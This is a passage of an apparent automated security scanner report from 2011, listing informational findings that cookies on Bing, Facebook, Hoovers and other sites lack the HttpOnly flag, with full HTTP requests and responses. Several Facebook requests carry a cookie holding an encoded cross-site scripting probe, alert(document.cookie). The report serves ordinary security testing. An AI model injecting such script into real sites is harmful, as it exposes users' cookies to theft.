Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:32 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.446. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 104406
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:42 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:42 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=7FC2B9E0CBF74E82B9CBB24E9A9E9968; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1794478ef78b42b7a8959b47602883b6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.447. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck?q=Weather+Forecast&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 109040
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.578 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:38 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=189D8011DB3941A584C4CAEF4613E7B3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47c05fe66c744af789142972f6f75ef7; expires=Tue, 29-Jan-2013 17:00:37 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:38 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.448. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 77783
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:17:39 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=B48B65D00BAF403892E682EAA8E2B594; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c33acc47a03c24f7995d266e4fbbb34ac; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:39 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.449. http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/ryan-seacrest-part-1/17wnurhvy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/ryan-seacrest-part-1/17wnurhvy HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68975
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:25 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:25 GMT
Connection: close
Set-Cookie: _SS=SID=A982272C07BD4E90B5DE76723277906D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2c1f9480a1dd4b8883876429b35f6f0c; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.450. http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/where-it-all-began/17wv375x2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/where-it-all-began/17wv375x2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68842
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:34 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:34 GMT
Connection: close
Set-Cookie: _SS=SID=0A2FC48D77544E149B050D7F74A8325B; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c281ac093fd6548bda49e28e4474b2b6f; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:34 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.451. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 74503
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:28 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.031 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:28 GMT
Connection: close
Set-Cookie: _SS=SID=1C20FB52E6FA4423ADB90121688D5B2C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5ccc44826f8244ed9ff22ec7485c1ee5; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

17.452. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.404292352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 30 Jan 2011 01:52:17 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31057
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

17.453. http://www.co2stats.com/prowidget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.co2stats.com
Path:   /prowidget.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /prowidget.php?s=1138&scrfr=0.43571354166666665&ref=http://news.ycombinator.com/news HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:33 GMT
Server: Apache/2.2.17
Set-Cookie: CO2STATSPRO-1138=1296398853; expires=Mon, 30-Jan-2012 14:47:33 GMT
Set-Cookie: CO2STATSPROEVER3=show; expires=Mon, 30-Jan-2012 14:47:33 GMT
Set-Cookie: CO2Stats-U=true; expires=Tue, 01-Feb-2011 05:00:00 GMT
Content-Type: image/png
Content-Length: 8774

...[SNIP]...

17.454. http://www.collectspace.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collectspace.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.collectspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 03:05:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-caklakng=BB42101B5313E42DA76A9065185BD7FC; path=/
Last-Modified: Sat, 29 Jan 2011 15:33:04 GMT
Content-Length: 35661

<HTML>
<HEAD>
<META NAME="description" CONTENT="Source for space history, space artifacts, and space memorabilia. Learn where astronauts will appear, browse collecting guides, and read original space
...[SNIP]...

17.455. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:38 GMT
Content-Length: 11463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

17.456. http://www.facebook.com/HelenASPopkin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HelenASPopkin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HelenASPopkin HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:48 GMT
Content-Length: 14974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

17.457. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:50 GMT
Content-Length: 10625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

17.458. http://www.facebook.com/todd.kenreck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /todd.kenreck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /todd.kenreck HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 03:05:49 GMT
Content-Length: 14802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

17.459. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 02:53:36 GMT
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 18009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Take Th
